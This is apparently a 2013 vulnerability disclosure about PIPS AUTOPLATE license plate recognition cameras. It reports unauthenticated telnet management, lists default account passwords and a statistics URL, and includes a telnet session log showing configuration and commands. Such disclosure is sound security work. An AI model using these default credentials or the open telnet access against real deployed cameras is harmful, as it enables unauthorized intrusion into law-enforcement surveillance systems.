PIPS Technology AUTOPLATE Automatic License Plate Recognition (ALPR) Multiple Vulnerabilities

PIPS Technology AUTOPLATE is a license plate recognition system used by law enforcement (Shodan search) in stop light camera systems. “PIPS Technology ALPR processors are complete one-box processors for automatic licence plate recognition (ALPR).” By default these devices offer a telnet connection for management that does not require authentication!

They also have a series of default accounts and / or passwords:

Component – Account – Password
html – root – ?
pdb – wl_test – wl_test
ves – vesstore – vesstore
jpeg – ftp_boot – ftp_boot

With the html component credentials you can access the web server for information about the camera’s capture statistics:

http://1.2.3.4/cgiC/capture%20st$ats

Camera 1
fields: 1038585
images: 0
plates: 0
reads : 0
good : 0
…

Camera 2
fields: 1787601
images: 36781
plates: 5440
reads : 1283
good : 1269

Here is a partial log of what the command interface looks like:

Script started on Tue Nov 19 10:27:32 2013
df$ telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.

ATZ
P372 application Apr 13 2010 12:29:02
P372 Serial Number: 1234
pcb:1, vers:03, rel:x06, build:3145
RAM: 128M @ 128M EPROM: 512k
Flex vers: 16.0, capabilities 003f
Camera firmware: 4.34
362 epld vers: 13
ANPR enabled for: USA Louisiana
Operating system: C EXECUTIVE 3.3
eprom image checksum: 1408
application crc: 4714
current config crc: 1434
reference config crc: 1434
* Installed options: 00200018
* … Compact Flash
* … Basic VES with no security
* … USA Licenceplate recognition
* PIPS Technology AUTOPLATE ™ license plate recognition
* VES – (violation enforcement system)
>>system show
system
flex: flash;3722acyc.z16
exposure: mem:/expose.cnf
startup: mem:/startup.scr
time_server: 2.3.4.5
alt_time_server: 10.1.1.1
font8: flash;font_8.8k
font16: flash;font_16.32k
route: ves
access_list: mem:/access.txt
sntp_enable: 0x13
daytime_port: 0
time_zone: -6
time_poll: 300
sntp_latency: 1000
sntp_window: 200
sntp_debug: 0
sntp_max: 24
brownout: 125
powerdown: 5000
idle_time: 0
idle_mode: 0x7
plate_type: 1
plate_max: 120
plate_min: 50
t_enable: 0
t_period: 600
sio362_debug: 0
led_current: 7
ftp_debug: 0
tn_timeout: 600
access_debug: 0
cc_eds: 0
reload: 0
ping_mode: 1
ping_port: 10010
sysdump: 0
old_script: 1
* CMD:OK
>>active show
active
days:
start_1:
end_1:
start_2:
end_2:
enable: 0
debug: 0
* CMD:OK
>>client show
client
patch: 1
sum: 0
debug: 0
config: 0
threshold: 50
* CMD:OK

..

>>help
Available Commands are:
system
active
client
vf
jpeg
bmp
ves
anpr
log
pdb
capture
closeloop
trigger
ves diag
ves exc
html
mbip
mail
net
key
dump
show
set
clear
barcode
help
install
test
camera
ftp
reset
shutdown
exit
flash
flex
fs
encrypt
sleep
rtelnet
snap
trap
script
ping
jam
option
ata
cld
dir
ls
md
rd
rm
del
ren
cd
check
copy
cmp
type
cat
mkfs
partition
scan
creat
image
make
destroy
tail
gzip
gunzip
kermit
action
>>rtelnet
Require IP address and optional port parameters
>>trap show
not implemented
* CMD:ERROR 1
>>script show
cannot open script show on local disk
attempting to fetch script from server
script not found on server
* CMD:ERROR 1
>>ping
PING 1.2.3.4 (1.2.3.4): 56 data bytes
64 bytes from 1.2.3.4: icmp_seq=0 ttl=59 time=23 ms
64 bytes from 1.2.3.4: icmp_seq=1 ttl=59 time=32 ms
64 bytes from 1.2.3.4: icmp_seq=2 ttl=59 time=42 ms
64 bytes from 1.2.3.4: icmp_seq=3 ttl=59 time=31 ms

— 1.2.3.4 ping statistics —
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 14/54/42 ms
* CMD:OK
>>dir
mem:/
EVENT .OLD w—- 40790 bytes 19/11/2013 7:35:12
EVENT .LOG w—a 1706 bytes 19/11/2013 17:28:52
TIME .TXT w—a 11 bytes 19/11/2013 17:32:26
SYSTEM .INI w—a 4283 bytes 19/11/2013 7:35:20
EXPOSE .CNF w—a 190 bytes 4/05/2013 1:18:26
VES . w–d- dir 4/05/2013 1:19:06
OPENED . w—- 0 bytes 4/05/2013 1:19:10
SEQ . w—a 8 bytes 19/11/2013 17:31:10
ENTROPY .BIN w—a 112 bytes 19/11/2013 17:23:02
MONITOR .INI w—a 67 bytes 16/10/2013 15:33:56
ACCESS1 .DEF w—a 526 bytes 19/11/2013 17:20:54

10 files, 1 subdirectory. Total Disk Capacity: 2048 k, Total shown here: 46 k
* CMD:OK
>>type event.log
19-Nov-2013 07:35:12:(9) ( start), EVENT LOG START UP
19-Nov-2013 07:35:12:(6) ( start), trimming 23 lines from event log history
19-Nov-2013 07:35:12:(9) ( start), integrity: 40 seconds since last update
19-Nov-2013 07:35:12:(6) ( mon_temp), no temperature sensor
19-Nov-2013 07:35:12:(9) ( start), access control list not present
19-Nov-2013 07:35:12:(9) ( start), software options: 00200018
19-Nov-2013 07:35:16:(9) ( start), Hardware JPEG Chip 1 software option not present
19-Nov-2013 07:35:16:(9) ( start), Hardware JPEG Chip 2 software option not present
19-Nov-2013 07:35:17:(6) ( start), sync set to: 625
19-Nov-2013 07:35:17:(9) ( stream), Platform will not support streaming video
19-Nov-2013 07:35:17:(9) ( ves), Software options set are not compatable with encryption or context capture
19-Nov-2013 07:35:17:(9) ( vid_events), VIDEO: P372 twin video input process starting

..

>>cat system.ini
[net]
mask=255.255.255.224
bcast=192.200.200.255
gateway=1.2.3.1
script=mem:/net01.scr
speed=0

..

telnet> close
Connection closed.
df$ exit
exit

Script done on Tue Nov 19 10:33:06 2013

Tags: Defaults, Shodan, Traffic Management